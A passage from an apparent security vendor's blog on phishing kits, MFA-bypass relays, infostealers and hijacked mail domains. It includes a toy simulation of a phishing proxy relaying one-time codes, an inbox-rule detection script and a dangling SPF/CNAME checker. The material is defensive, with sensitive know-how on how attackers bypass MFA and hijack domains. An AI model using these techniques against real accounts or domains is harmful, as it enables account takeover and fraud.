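    def prove(self, challenge: bytes, browser_origin: str) -> bytes:
        return hmac.new(self.device_key, challenge + browser_origin.encode(),
                        hashlib.sha256).digest()


def aitm_totp_attack(service: Service, auth: Authenticator, now: int) -> Optional[str]:
    """Victim types password and OTP into the phishing page; the kit relays both verbatim."""
    code = auth.current_code(now)                 # copied from the app within 30 s
    return service.login_totp(PASSWORD, code, now)  # succeeds: session goes to the kit


def aitm_origin_bound_attack(service: Service, auth: Authenticator) -> Optional[str]:
    """Kit relays the real challenge, but the browser signs for the lure's origin."""
    challenge = service.challenge()               # fetched through the proxy
    proof = auth.prove(challenge, PHISH_ORIGIN)   # browser is really on PHISH_ORIGIN
    # The kit can forward this proof but cannot forge one over LEGIT_ORIGIN: it never
    # holds device_key. The service rejects it.
    return service.login_origin_bound(challenge, proof)


def legit_origin_bound_login(service: Service, auth: Authenticator) -> Optional[str]:
    challenge = service.challenge()
    return service.login_origin_bound(challenge, auth.prove(challenge, LEGIT_ORIGIN))


if __name__ == "__main__":
    svc, dev = Service(), Authenticator(svc)
    now = int(time.time())
    print("TOTP relayed through proxy:        ", aitm_totp_attack(svc, dev, now) is not None)
    print("Origin-bound relayed through proxy:", aitm_origin_bound_attack(svc, dev) is not None)
    print("Origin-bound direct login:         ", legit_origin_bound_login(svc, dev) is not None)
```

Real WebAuthn uses a per-credential asymmetric key and includes the origin in the signed client data, but the property demonstrated is the same: the secret that proves possession never leaves the device, and what it signs names the site the browser actually loaded, so a look-alike domain gets a signature the real site will not accept.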
The kit is priced at $120 for 10 days of access, so the payments received represent thousands of rentals, which shows how popular the platform is with cybercriminals.\r\nPhaaS platforms allow cybercriminals to conduct sophisticated attacks and bypass MFA without having to invest time and money setting up their own infrastructure; they significantly lower the entry barrier for conducting MFA-bypassing phishing attacks. An advanced spam filtering service such as SpamTitan Plus will help to prevent malicious emails from reaching inboxes, and is an ideal spam filter for MSPs looking to provide the best level of protection for their clients. The SpamTitan suite of email security solutions combines phishing, spam, and antivirus filtering, and independent tests show a spam block rate of 99.983% and a malware block rate of 99.51%. PhishTitan from TitanHQ greatly improves protection against more advanced phishing campaigns such as those that use QR codes. Employees should be provided with regular security awareness training to help them identify and avoid phishing messages, and businesses should consider phishing-resistant MFA (FIDO2/WebAuthn security keys or passkeys, whose response is bound to the site’s real origin and so cannot be relayed from a look-alike domain) rather than more basic forms of 2-factor authentication that use SMS or one-time passwords, which phishing kits such as Tycoon 2FA can easily bypass.\r\nTitanHQ Expands Global Footprint into Africa with Strategic Alliance with Equinox Technologies\r\nby G Hunt | March 26, 2024 | Industry News\r\nTitanHQ has announced it has signed a new partnership agreement with Equinox Technologies which will see TitanHQ’s cybersecurity solutions offered throughout Africa. Equinox Technologies is a pan-African, tech-enabled business service provider that provides a range of services to more than 40 countries in Africa from its operational hubs in Abuja, Nigeria; Cape Town, South Africa; Nairobi, Kenya; and Tunis, Tunisia. 
Equinox Technologies helps businesses of all sizes expand and invest seamlessly across international borders through the provision of business-critical administrative, security, and compliance support. The services provided include enterprise mobility management, software engineering, IT operations, digital services, and cybersecurity.\r\nThe strategic alliance with TitanHQ will see Equinox Technologies act as a value-added distributor, packaging TitanHQ solutions with other products and services to meet its clients’ cybersecurity and compliance needs and better protect them from the rapidly evolving landscape of cyber threats. Under the new agreement, Equinox Technologies will become the exclusive distributor of TitanHQ solutions in Africa, further expanding TitanHQ’s global footprint.\r\nEquinox Technologies will help its clients improve email security by offering TitanHQ’s cloud-based anti-spam service (SpamTitan), phishing protection solution (PhishTitan), and email encryption solution (EncryptTitan); protect them from web-based threats with TitanHQ’s DNS filtering solution (WebTitan); address threats that target employees with TitanHQ’s security awareness training and phishing simulation platform (SafeTitan); and help them meet their email retention and compliance obligations through TitanHQ’s email archiving solution (ArcTitan).\r\n“This collaboration signifies Equinox Technologies’ commitment to fortifying its cybersecurity offerings,” said TitanHQ CEO, Ronan Kavanagh. 
“Together, Equinox Technologies and TitanHQ will be able to shield African\r\ncompanies from the constantly evolving landscape of cyber threats through a comprehensive suite of security\r\nsolutions.”\r\nFacebook Messages Used to Distribute Snake Infostealer Malware\r\nby G Hunt | March 20, 2024 | Phishing \u0026 Email Spam\r\nMalware is often distributed via email or websites linked in emails, and advanced email security solutions such as\r\nSpamTitan Plus can protect you by preventing the messages from reaching inboxes. SpamTitan Plus uses dual\r\nantivirus engines to detect known malware and sandboxing to identify and block zero-day malware threats.\r\nSpamTitan Plus also rewrites URLs, uses predictive analysis to identify suspicious URLs, and blocks those URLs\r\nto prevent users from reaching the websites where malware is hosted. To get around email security solutions,\r\ncybercriminals use other methods for making initial contact with end users, and instant messaging services are a\r\npopular alternative.\r\nResearchers at Cybereason recently identified a malware distribution campaign that distributes a Python-based\r\ninformation stealer via Facebook messages. The infostealer has been dubbed Snake and has been developed to\r\nsteal credentials and other sensitive information. The campaign was first detected in the summer of 2023 and\r\ntargets businesses. The messages use lures such as complaints and offers of products from suppliers to trick users\r\ninto visiting a link and downloading a file. As is common with malware distribution campaigns, the threat actor\r\nuses legitimate public repositories for hosting the malicious file, such as GitHub and GitLab. The file to which the\r\nuser is directed is a compressed file and, if extracted, will lead to the execution of a first-stage downloader. 
The first-stage downloader fetches a second compressed file, extracts the contents, and executes a second downloader, which delivers the Python infostealer.\r\nThree different variants of the infostealer have been identified, all of which gain persistence via the Startup folder. Each variant targets web browsers, including Brave, Chromium, Chrome, Edge, Firefox, Opera, and the Vietnamese Cốc Cốc browser, with the latter and other evidence suggesting that the campaign is being conducted by a Vietnamese threat actor. All three variants also target Facebook cookies. The gathered data and cookies are exfiltrated in a .zip file via the Telegram Bot API or Discord.\r\nOne way of blocking these attacks is to use a web filter to block access to instant messaging services that are not required for business purposes, including Facebook Messenger. With WebTitan it is possible to block Messenger without blocking the Facebook site, and per-user controls can allow staff responsible for the organization’s social media accounts to reach the platforms while preventing access for other users. It is also good practice to use WebTitan to block downloads of executable files from the Internet, which both prevents malware delivery and stops employees from downloading and installing unauthorized software.\r\nDropbox Abused in Novel Phishing Attack to Obtain M365 Credentials\r\nby G Hunt | March 14, 2024 | Phishing \u0026 Email Spam\r\nThe file hosting service Dropbox is being abused in a novel phishing campaign that exploits trust in the platform to harvest Microsoft 365 credentials. The campaign targeted 16 employees of an organization, who received an email from the no-reply[@]dropbox.com account, a legitimate email address used by Dropbox. 
The emails\r\nincluded a link that directed the recipients to a Dropbox-hosted PDF file, which was named to appear as if it had\r\nbeen created by one of the organization’s partners. If the PDF file was opened, the user would see a link that\r\ndirects them to an unrelated domain – mmv-security[.]top. One of the employees was then sent a follow-up email\r\nreminding them to open the PDF file that was sent in the first email. They did, and they were directed to a\r\nphishing page that spoofed the Microsoft 365 login page. A couple of days later, suspicious logins were detected\r\nin the user’s Microsoft 365 account from unknown IP addresses, which were investigated and found to be\r\nassociated with ExpressVPN, indicating the attacker was using the VPN to access the account and mask their IP\r\naddress.\r\nMultifactor authentication was correctly configured on the account but this appears to have been bypassed, with\r\nthe logins appearing to use a valid MFA token. After capturing credentials, the employee is thought to have\r\nunknowingly approved the MFA authentication request which allowed the account to be compromised. The\r\nattacker gained access to the user’s email account and set up a new rule that moved emails from the organization’s\r\naccounts team to the Conversation History folder to hide the malicious use of the mailbox. Emails were also sent\r\nfrom the account to the accounts team in an apparent attempt to compromise their accounts.\r\nPhishing attacks are becoming increasingly sophisticated and much more difficult for end users to identify.\r\nSecurity awareness training programs often teach users about the red flags in emails they should look out for, such\r\nas unsolicited emails from unknown senders, links to unusual domains, and to be wary of any requests that have\r\nurgency and carry a threat should no action be taken. 
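The inbox rule that hid the accounts team’s mail in the Conversation History folder is a standard follow-on to account takeover, and it leaves a trail: Exchange Online writes a New-InboxRule or Set-InboxRule record to the unified audit log. The added example below (not from the original post or from TitanHQ’s tooling) scores such records for the tell-tale settings: moving mail to a rarely viewed folder, deleting it or marking it read, forwarding it externally, and matching finance-related senders. The sample records are constructed; the Operation/Parameters layout mirrors the audit log’s shape, while the corporate IP range, the folder list and the scoring weights are assumptions for the demonstration.

```python
"""Hunt for attacker-created inbox rules in Microsoft 365 unified audit log records.

Added example (not part of the original post or of TitanHQ's products). Records are
constructed to follow the shape of Exchange 'New-InboxRule' / 'Set-InboxRule' audit
entries: an Operation plus a Parameters list of Name/Value pairs. The corporate IP
range, hiding-folder list and weights are assumptions for the demo.
"""
import json

RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule", "UpdateInboxRules"}
# Folders users rarely open; attackers commonly park diverted mail there (assumed list).
HIDING_FOLDERS = {"conversation history", "rss feeds", "rss subscriptions",
                  "archive", "junk email", "deleted items"}
FINANCE_KEYWORDS = ("invoice", "payment", "wire", "bank", "accounts", "remit")
CORPORATE_PREFIX = "10."  # assumed internal range for the demo


def _params(record: dict) -> dict:
    """Flatten the audit record's Parameters list into a {Name: Value} dict."""
    return {p.get("Name"): str(p.get("Value", "")) for p in record.get("Parameters", [])}


def score_rule(record: dict) -> dict:
    """Return {'score': int, 'reasons': [...]} for one record; 0 means uninteresting."""
    if record.get("Operation") not in RULE_OPERATIONS:
        return {"score": 0, "reasons": []}
    p = _params(record)
    reasons, score = [], 0
    folder = p.get("MoveToFolder", "").strip("\\").lower()
    if folder in HIDING_FOLDERS:
        reasons.append(f"moves mail to rarely viewed folder '{p['MoveToFolder']}'")
        score += 3
    if p.get("DeleteMessage", "").lower() == "true":
        reasons.append("deletes matching messages")
        score += 3
    if p.get("MarkAsRead", "").lower() == "true":
        reasons.append("marks messages as read")
        score += 1
    if p.get("ForwardTo") or p.get("RedirectTo") or p.get("ForwardAsAttachmentTo"):
        reasons.append("forwards or redirects mail")
        score += 3
    text = " ".join(p.get(k, "") for k in ("From", "SubjectContainsWords",
                                              "BodyContainsWords")).lower()
    if any(k in text for k in FINANCE_KEYWORDS):
        reasons.append("targets finance-related senders or keywords")
        score += 2
    if len(p.get("Name", "")) <= 2:
        reasons.append("rule name is empty or a single character")
        score += 1
    ip = record.get("ClientIP", "")
    if ip and not ip.startswith(CORPORATE_PREFIX):
        reasons.append(f"created from non-corporate address {ip}")
        score += 1
    return {"score": score, "reasons": reasons}


def triage(records: list, threshold: int = 4) -> list:
    """Return (user, score, reasons) for records at or above threshold, highest first."""
    hits = []
    for r in records:
        s = score_rule(r)
        if s["score"] >= threshold:
            hits.append((r.get("UserId"), s["score"], s["reasons"]))
    return sorted(hits, key=lambda h: -h[1])


def load_records(raw: str) -> list:
    return json.loads(raw)


# Constructed sample records (not real tenant data).
SAMPLE_LOG = json.dumps([
    {"Operation": "New-InboxRule", "UserId": "j.doe@example.invalid", "ClientIP": "203.0.113.45",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "From", "Value": "accounts@example.invalid"},
                    {"Name": "MoveToFolder", "Value": "Conversation History"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "a.smith@example.invalid", "ClientIP": "10.1.4.22",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "SubjectContainsWords", "Value": "weekly digest"},
                    {"Name": "MoveToFolder", "Value": "Reading"}]},
    {"Operation": "UserLoggedIn", "UserId": "a.smith@example.invalid", "ClientIP": "10.1.4.22"},
])

if __name__ == "__main__":
    for user, score, reasons in triage(load_records(SAMPLE_LOG)):
        print(f"{user} score={score}")
        for reason in reasons:
            print("   -", reason)
```

Run the same scoring over the rules a user already has (Get-InboxRule output) as well as over new audit events; the rule in this incident would have scored high on three counts at once, which is the pattern worth an automatic alert rather than a weekly report.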
Impersonation is common in phishing attacks, but in this case the impersonation went further: the emails were genuinely sent from a valid and trusted Dropbox account, so they pass sender authentication checks, are more likely to be trusted by the recipient, and are unlikely to be blocked by email security solutions, especially as the link points to a file hosted on a trusted platform. This was also a staged attack, with a follow-up email that proved effective even though it was delivered to the junk email folder. The login page to which the user was directed looked exactly the same as the genuine Microsoft 365 login prompt, aside from the domain on which it was hosted.\r\nMany businesses have configured multifactor authentication on their Microsoft 365 accounts, but as this attack demonstrates, MFA that relies on approving a prompt or typing a code can be bypassed when the user completes the challenge on the attacker’s page. The sophisticated nature of phishing attacks such as this demonstrates how important it is for businesses to have advanced defenses against phishing. TitanHQ’s anti-phishing solutions use AI and a large language model (LLM) with proprietary threat intelligence currently not found in any other anti-phishing and anti-spam software solutions on the market. All emails are scanned, internal and external, for phrases and keywords that are unusual and could indicate malicious intent. All URLs are checked against various threat intelligence feeds to identify malicious URLs, and URLs are rewritten to show their true destination. The solution also learns from feedback provided by users, and detection improves further over time. 
The curated and unique email threat intelligence data is unmatched in visibility, coverage, and accuracy, and TitanHQ’s anti-spam and email security solutions feature sandboxing, where attachments are subjected to deep analysis in addition to signature-based anti-virus scanning. When a malicious email is detected, all other instances are removed from the entire M365 tenant.\r\nIf you want to improve your defenses against sophisticated phishing attacks, give the TitanHQ team a call. If you are a managed service provider looking for an easy-to-use solution to protect your clients from phishing and malware, look no further than TitanHQ. All solutions have been developed from the ground up to meet the needs of MSPs and better protect their customers from spam, phishing, malware, and BEC attacks.\r\nCryptoChameleon Phishing Kit Targets FCC Employees and Cryptocurrency Platform Users\r\nby G Hunt | March 5, 2024 | Phishing \u0026 Email Spam\r\nA new phishing kit has been identified that is being used to target employees of the U.S. Federal Communications Commission (FCC) and of the cryptocurrency platforms Binance and Coinbase, as well as users of cryptocurrency platforms including Binance, Coinbase, Caleb \u0026 Brown, Gemini, Kraken, ShakePay, and Trezor.\r\nA phishing kit is a set of tools and templates that allows threat actors to conduct effective phishing campaigns. These kits are marketed on the dark web and allow buyers to conduct phishing campaigns without having to invest time and money in setting up their own infrastructure. Phishing kits range from simple kits that provide phishing templates and cloned login pages to more advanced kits capable of adversary-in-the-middle attacks that defeat multifactor authentication. These kits significantly lower the entry barrier for conducting phishing campaigns, as they require little technical expertise. 
Pay a relatively small fee and sophisticated phishing campaigns can be conducted in a matter of minutes.\r\nThe new phishing kit is called CryptoChameleon and allows its users to create carbon copies of the single sign-on (SSO) pages used by the targeted businesses. Employees are used to authenticating through a single SSO portal that then grants them access to many business applications, so a convincing copy of that one page is enough. The kit also includes templates for phishing pages to harvest the credentials of cryptocurrency platform users and employees, including pages that impersonate Okta, iCloud, Gmail, Outlook, Yahoo, AOL, and Twitter.\r\nThe phishing operation was discovered by researchers at Lookout, and more than 100 high-value victims of this campaign have been identified to date. Threat actors using the kit have been contacting users via SMS, email, and phone calls to trick them into visiting a malicious site where their credentials are harvested. Users are redirected to a phishing site, but before the content is displayed they are required to pass an hCaptcha check. This helps with the credibility of the campaign, but most importantly it prevents automated analysis tools and security solutions from reaching and identifying the phishing page.\r\nIn the campaign targeting FCC employees, after passing the hCaptcha check the user is presented with a login page that is a carbon copy of the FCC Okta page. The domain on which the page is hosted, fcc-okta[.]com, differs by only one character from the legitimate FCC Okta login domain. Login credentials alone are not normally enough to gain access to accounts, as many are now protected by MFA. 
The captured login credentials\r\nare used to log in to the real account in real time, and the victim is then directed to the appropriate page where\r\nadditional information is collected to pass the MFA checks. This could be a page that requests their SMS-based\r\ntoken or the MFA token from their authenticator app. Once the MFA check has been passed and the account has\r\nbeen accessed by the threat actor, the victim can be redirected anywhere. For instance, they could be shown a\r\nmessage that the login has been unsuccessful and they must try again later.\r\nTo target cryptocurrency platform users, messages are sent about security alerts such as warnings that their\r\naccount has been accessed. These messages are likely to attract a rapid response due to the risk of substantial\r\nfinancial losses. In the campaign targeting Coinbase, the user is told they can secure their account and if they log\r\nin they can terminate suspicious devices. A process similar to that of the FCC campaign is used to obtain the credentials and MFA codes needed\r\nto access the account.\r\nThis is just one of many phishing kits offered on the dark web. Protecting against these phishing kits requires a\r\ncombination of measures including an advanced spam filter, web filter, and security awareness training. For\r\nfurther information on cybersecurity solutions capable of combatting advanced phishing attempts, give the\r\nTitanHQ team a call.\r\nState Sponsored Hackers and Cybercriminal Groups Are Using AI to Improve\r\nTheir Campaigns\r\nby G Hunt | February 29, 2024 | Network Security\r\nThere is growing evidence that cybercriminal groups are leveraging artificial intelligence in their cyberattacks,\r\nspecifically large language models (LLMs) such as ChatGPT, despite the restrictions OpenAI has put in place.\r\nThere are also LLMs that are being marketed directly to cybercriminals such as WormGPT. 
WormGPT is a\r\nblackhat AI tool that has been specifically developed for malicious uses and can perform similar tasks to ChatGPT\r\nbut without any ethical restrictions on uses. The tool can be used for generating convincing phishing and business\r\nemail compromise emails in perfect English, free from the spelling mistakes and grammatical errors that are often\r\nfound in these emails.\r\nIt is not only cybercriminal groups that are using these AI tools. Nation state hacking groups are exploring how\r\nthese tools can help them gain initial access to targeted networks. Recently published research from Microsoft and\r\nOpenAI confirmed that threat actors from Russia, China, Iran, and North Korea are using AI tools to support their\r\nmalicious activities. Microsoft and OpenAI found the most common uses of LLMs by nation state actors were for\r\ntranslation, finding coding errors, running basic coding tasks, and querying open-source information. While it\r\ndoes not appear that they are using LLMs to generate new methods of attack or write new malware variants, these\r\ntools are being used to improve and accelerate many aspects of their campaigns.\r\nThe threat actor tracked by Microsoft as Crimson Sandstorm, which is affiliated with the Islamic Revolutionary\r\nGuard Corps (IRGC), a multi-service primary branch of the Iranian Armed Forces, has been using LLMs to\r\nimprove its phishing campaigns to gain initial access to victims’ networks. Microsoft and OpenAI also report that\r\nthe hacking group has been using LLMs to enhance its scripting techniques to help them evade detection. 
The\r\nNorth Korean APT group, Emerald Sleet, is well known for conducting spear phishing and social engineering\r\ncampaigns and is using LLMs to assist with researching think tanks and key individuals that can be impersonated\r\nin its spear phishing campaigns. Threat groups linked to the People’s Republic of China such as Charcoal Typhoon\r\nand Salmon Typhoon have been using LLMs to obtain information on high-profile individuals, regional\r\ngeopolitics, US influence, and internal affairs and for generating content to socially engineer targets. OpenAI says\r\nit has terminated the accounts of five malicious state actors and has worked with Microsoft to disrupt their\r\nactivities, and OpenAI and Microsoft have been sharing data with other AI service providers to allow them to take\r\naction to prevent malicious uses of their tools.\r\nIt should come as no surprise that cybercriminals and nation state actors are using AI to improve productivity and\r\nthe effectiveness of their campaigns and are probing the capabilities of AI-based tools, and while this is a cause of\r\nconcern, there are steps that businesses can take to avoid falling victim to AI-assisted attacks. The best way to\r\ncombat AI-assisted attacks is to leverage AI for defensive purposes. SpamTitan has AI and machine learning\r\ncapabilities that can detect zero day and AI-assisted phishing, spear phishing, and business email compromise\r\nattacks and better defend against AI-assisted email campaigns.\r\nWith fewer spelling mistakes and grammatical errors in phishing emails, businesses need to ensure they provide\r\ntheir workforce with comprehensive training to help employees recognize email and web-based attacks. The\r\nSafeTitan security awareness training and phishing simulation platform is an ideal choice for conducting training\r\nand phishing simulations and improves resilience to a range of security threats. 
TitanHQ’s data shows\r\nsusceptibility to phishing attacks can be reduced by up to 80% through SafeTitan training and phishing\r\nsimulations. Businesses should also ensure that all accounts are protected with multi-factor authentication, given\r\nthe quality of the phishing content that can be generated by AI tools, and ensure that cybersecurity best practices\r\nare followed, and cybersecurity frameworks are adopted. The most important advice that we can give is to take\r\naction now and proactively improve your defenses, as malicious uses of AI are only likely to increase.\r\nPhishing-as-a-Service Poses a Serious Threat to Businesses\r\nby G Hunt | February 28, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are increasingly offering services that make it easy for anyone to conduct an attack. Skilled\r\nmalware developers can concentrate on writing their malware and making it available for others to use for a fee,\r\nransomware-as-a-service allows hackers who are skilled at breaching networks to conduct lucrative ransomware\r\nattacks without having to develop encryptors and pay for the infrastructure to support their attacks, and phishing-as-a-service provides a platform for conducting attacks to steal credentials and access accounts. These services\r\nbenefit all parties and allow even more attacks to be conducted.\r\nPhishing campaigns may appear simple, but they require a lot of time and skill to set up. Stephanie Carruthers,\r\nwho leads an IBM X-Force phishing research project, said it takes her team about 16 hours to craft a phishing\r\nemail, not including the time it takes to set up all the necessary infrastructure to send the email and steal\r\ncredentials. 
Setting up the infrastructure is time-consuming and costly, and many businesses now have multi-factor authentication (MFA) to thwart attacks.\r\nWith phishing-as-a-service (PhaaS), anyone who wants to run a phishing campaign can simply pay a subscription\r\nand will be provided with all the tools they need to conduct attacks. They do not need to craft the phishing emails,\r\nthey just need to set a few parameters and provide the email addresses for the campaign. PhaaS makes conducting\r\nsophisticated attacks simple and significantly lowers the bar for conducting campaigns.\r\nTake LabHost, for example, a PhaaS platform that recently introduced functionality for targeting financial\r\ninstitutions and banks in North America and Canada. Since this new functionality was included in the first half of\r\n2023, attacks have increased considerably. A monthly subscription is paid, and customers are provided with a\r\nturnkey phishing kit, which includes the infrastructure for hosting phishing pages, a content generator for creating\r\nphishing emails, and a portal for monitoring the progress of campaigns. Customers can choose to pay $179 per\r\nmonth to target Canadian banks, $249 per month to expand the targets to North America, and $300 a month to also\r\ntarget 70 financial institutions worldwide. Customers are also provided with phishing pages for collecting\r\ncredentials for a variety of other companies, including music streaming sites, delivery services, and\r\ntelecommunications companies.\r\nImportant to the success of any campaign is the ability to defeat multi-factor authentication. The LabHost phishing\r\nkit incorporates LabRat, a phishing tool that allows real-time management of phishing campaigns and allows\r\nadversary-in-the-middle attacks where two-factor authentication codes and cookies are obtained in addition to\r\nusernames and passwords. That means the additional security processes on the online portals of banks can be\r\ncircumvented. 
The platform also allows SMS-based attacks to be conducted.\r\nPhaaS allows unskilled hackers to conduct effective campaigns that they otherwise would not be able to conduct.\r\nFurther, with the use of AI to craft convincing phishing emails, phishing emails are becoming much harder for\r\nhumans and security solutions to detect, and even MFA and other security measures can be bypassed.\r\nDefending against attacks is therefore challenging, and there is no single cybersecurity solution that will block all\r\nattacks. What is needed is a defense-in-depth approach, with multiple, overlapping layers of protection.\r\nCybersecurity solutions are required to block the phishing emails. SpamTitan is an advanced email security\r\nsolution with AI and machine learning capabilities for identifying novel phishing threats. SpamTitan blocks\r\nknown malware through AV controls and unknown malware through sandboxing. The message sandboxing feature\r\nuses pattern filtering to identify malware from its behavior, which allows zero-day malware threats to be identified\r\nand blocked. Malware sandboxing is vital for email security since so many novel malware threats are now being\r\nreleased. SpamTitan is also capable of identifying even machine-crafted phishing content.\r\nEnd user training is also vital, as no email security solution will block all email threats without also blocking an\r\nunacceptable number of genuine emails. End users should be trained on how to identify, avoid, and report\r\nphishing emails. 
The SafeTitan security awareness training platform makes security awareness training simple,\r\nand the constantly updated content allows businesses to respond to changing phishing tactics and conduct phishing\r\nsimulations on the workforce to reinforce training and identify knowledge gaps.\r\nGiven the number of phishing kits that are capable of bypassing multi-factor authentication, simply enabling MFA\r\non accounts is no longer sufficient to protect against unauthorized access. Phishing-resistant multi-factor\r\nauthentication is required – FIDO/WebAuthn authentication or public key infrastructure (PKI)-based MFA – to\r\nblock adversary-in-the-middle attacks that can be conducted through PhaaS.\r\nIf you want to improve your defenses against phishing and other cybercriminal services, give the TitanHQ team a\r\ncall to discuss your options.\r\nMassive Spamming Campaign Uses Thousands of Hijacked Subdomains\r\nby G Hunt | February 26, 2024 | Phishing \u0026 Email Spam\r\nA massive email spamming campaign has been detected that is generating up to 5 million emails per day that\r\ndirect recipients of the emails to a variety of scam sites. The emails are sent through hijacked subdomains and\r\ndomains of trusted companies, which help these emails evade email security solutions and be delivered to inboxes.\r\nCompanies that have had domains and subdomains hijacked include eBay, CBS, McAfee, MSN, and Symantec.\r\nEmail security solutions perform a range of checks on inbound emails, including reputation checks on the senders\r\nof emails. If a domain is trusted and has not previously been associated with spamming, these checks – using\r\nSPF, DKIM, and DMARC – are likely to be passed, resulting in the emails being delivered to end users. 
The use\r\nof these legitimate domains also makes it harder for end users to determine whether the messages are genuine.\r\nSecurity awareness training programs often teach end users to check the sender of the email and make sure that it\r\nmatches the company being spoofed. If the domain is eBay, and the email uses eBay branding, end users are likely\r\nto think that the communication is genuine. These emails include links to websites that generate fraudulent ad\r\nrevenue, and often several redirects occur before the user lands on the destination scam or phishing site.\r\nThe ‘SubdoMailing’ campaign was identified by researchers at Guardio Labs, with the legitimate domains\r\ntypically hijacked through SPF record exploitation or CNAME hijacking. The former involves searching for\r\ndomains that use the ‘include’ configuration option that points to external domains that are no longer registered.\r\nThose domains are then registered by the threat actor and the SPF records are changed to authorize the use of their\r\nown email servers. When those servers are used to send emails, they appear to have been sent by the targeted\r\nbrand, such as eBay.\r\nWith CNAME hijacking, scans are conducted to identify subdomains of reputable brands with CNAME records\r\nthat point to external domains that are no longer registered. The threat actor then registers those domains, SPF\r\nrecords are injected, and emails can be sent from their email servers to show that they have been sent by a\r\nlegitimate company. By hijacking huge numbers of domains and subdomains, the threat actor is able to conduct\r\nmassive spamming campaigns. The researchers identified more than 13,000 subdomains and more than 8,000\r\ndomains that were used in the campaign, with more than 1000 residential lines used and almost 22,000 unique\r\nIPs. 
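Both hijack patterns described above, an SPF include: target that nobody registers any more and a subdomain CNAME that points at an abandoned external name, can be hunted for on a defender's own zones. The following is an added example written for this page, not the Guardio Labs tool or anything from the original post; it assumes DNS access through a resolver callable and uses constructed, non-real domain names so that it runs offline.

```python
"""Dangling SPF include / CNAME checker (added example, not the Guardio tool).

DNS access is abstracted behind a resolver callable so the example runs
offline against constructed records; plug in a real resolver for live use.
"""
from dataclasses import dataclass


class NXDomain(Exception):
    """Raised by a resolver when a name does not exist at all (hijackable)."""


@dataclass(frozen=True)
class Finding:
    kind: str      # "dangling-spf-include", "dangling-cname" or "spf-missing"
    owner: str     # the brand-owned name that references the target
    target: str    # the referenced external name


# ---- constructed sample DNS data (not real domains) ----
_RECORDS = {
    ("brand.example", "TXT"): [
        "v=spf1 include:_spf.mailvendor.example include:spf.old-vendor.example -all"],
    ("_spf.mailvendor.example", "TXT"): [
        "v=spf1 ip4:192.0.2.0/24 include:spf.transit.example -all"],
    ("spf.transit.example", "TXT"): ["some unrelated txt"],      # exists, no SPF
    ("promo.brand.example", "CNAME"): ["promo.old-saas.example"],  # target gone
    ("news.brand.example", "CNAME"): ["news.live-saas.example"],
    ("news.live-saas.example", "A"): ["198.51.100.7"],
}
_EXISTING = {name for name, _ in _RECORDS}


def sample_resolver(name, rtype):
    """Offline stand-in for DNS: NXDomain for unknown names, else record list."""
    name = name.rstrip(".").lower()
    if name not in _EXISTING:
        raise NXDomain(name)
    return _RECORDS.get((name, rtype), [])


def spf_record(name, resolver):
    """Return the v=spf1 TXT record for name, or None if it has none."""
    for txt in resolver(name, "TXT"):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None


def spf_targets(record):
    """Extract include: and redirect= targets from an SPF record, in order."""
    targets = []
    for term in record.split()[1:]:
        term = term.lstrip("+-~?")          # drop qualifier prefix
        if term.lower().startswith("include:"):
            targets.append(term.split(":", 1)[1])
        elif term.lower().startswith("redirect="):
            targets.append(term.split("=", 1)[1])
    return targets


def check_spf(domain, resolver, _seen=None):
    """Walk the include/redirect chain; flag targets that no longer exist."""
    seen = _seen if _seen is not None else set()
    findings = []
    if domain in seen:                      # guard against include loops
        return findings
    seen.add(domain)
    record = spf_record(domain, resolver)
    if record is None:
        return findings
    for target in spf_targets(record):
        try:
            target_record = spf_record(target, resolver)
        except NXDomain:                    # unregistered: anyone can claim it
            findings.append(Finding("dangling-spf-include", domain, target))
            continue
        if target_record is None:           # registered but publishes no SPF
            findings.append(Finding("spf-missing", domain, target))
        else:
            findings.extend(check_spf(target, resolver, seen))
    return findings


def check_cnames(subdomains, resolver):
    """Flag subdomains whose CNAME points at a name that does not exist."""
    findings = []
    for sub in subdomains:
        try:
            cname_targets = resolver(sub, "CNAME")
        except NXDomain:
            continue                        # our own name is gone; nothing to hijack
        for target in cname_targets:
            try:
                resolver(target, "A")
            except NXDomain:
                findings.append(Finding("dangling-cname", sub, target))
    return findings


def audit(domain, subdomains, resolver=sample_resolver):
    """Run both checks for one brand domain and its subdomains."""
    return check_spf(domain, resolver) + check_cnames(subdomains, resolver)


if __name__ == "__main__":
    for f in audit("brand.example", ["promo.brand.example", "news.brand.example"]):
        print(f"{f.kind}: {f.owner} -> {f.target}")
```

A live version would wrap a real DNS library as the resolver and, for SPF, also count the total lookups so a chain exceeding the RFC 7208 limit of 10 is reported alongside the dangling targets.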
The researchers developed a tool to allow domain owners to check whether their own domains have been\r\nhijacked and take action to stop that abuse. An advanced spam filter is required to block the messages that are sent\r\nfrom these hijacked domains and subdomains – one that does not rely on SPF, DKIM, and DMARC for\r\nidentifying spam emails.\r\nTravel Companies Impersonated in Malware Distribution Campaign\r\nby G Hunt | February 26, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are constantly devising new email campaigns for distributing malware. These campaigns usually\r\nimpersonate a trusted entity and advise the email recipient about a pressing issue that requires immediate\r\nattention. The emails often have an attached file that must be opened to find out further information about the\r\nissue detailed in the email.\r\nOne recently detected campaign impersonates travel service providers such as booking.com and advises the\r\nrecipient about a problem with a recent booking. One of the intercepted emails explains that an error has occurred\r\nwith a booking that has resulted in a double charge to the user’s credit card which requires immediate attention.\r\nThe email has a PDF attachment which needs to be opened for further information. PDF files are increasingly\r\nbeing used in email campaigns for distributing malware. The PDF files often contain a script that generates an\r\nerror message when the file is opened that tells the user that the content of the file cannot be displayed, and they\r\nare provided with an option to download the file.\r\nIn this campaign, the PDF file contains a script that generates a fake popup message. If clicked, a connection is\r\nmade to a malicious URL and a download of an obfuscated JavaScript file is initiated. The script downloads the\r\nnext stage PowerShell payload, and on execution, drops a malicious DLL file on the device. 
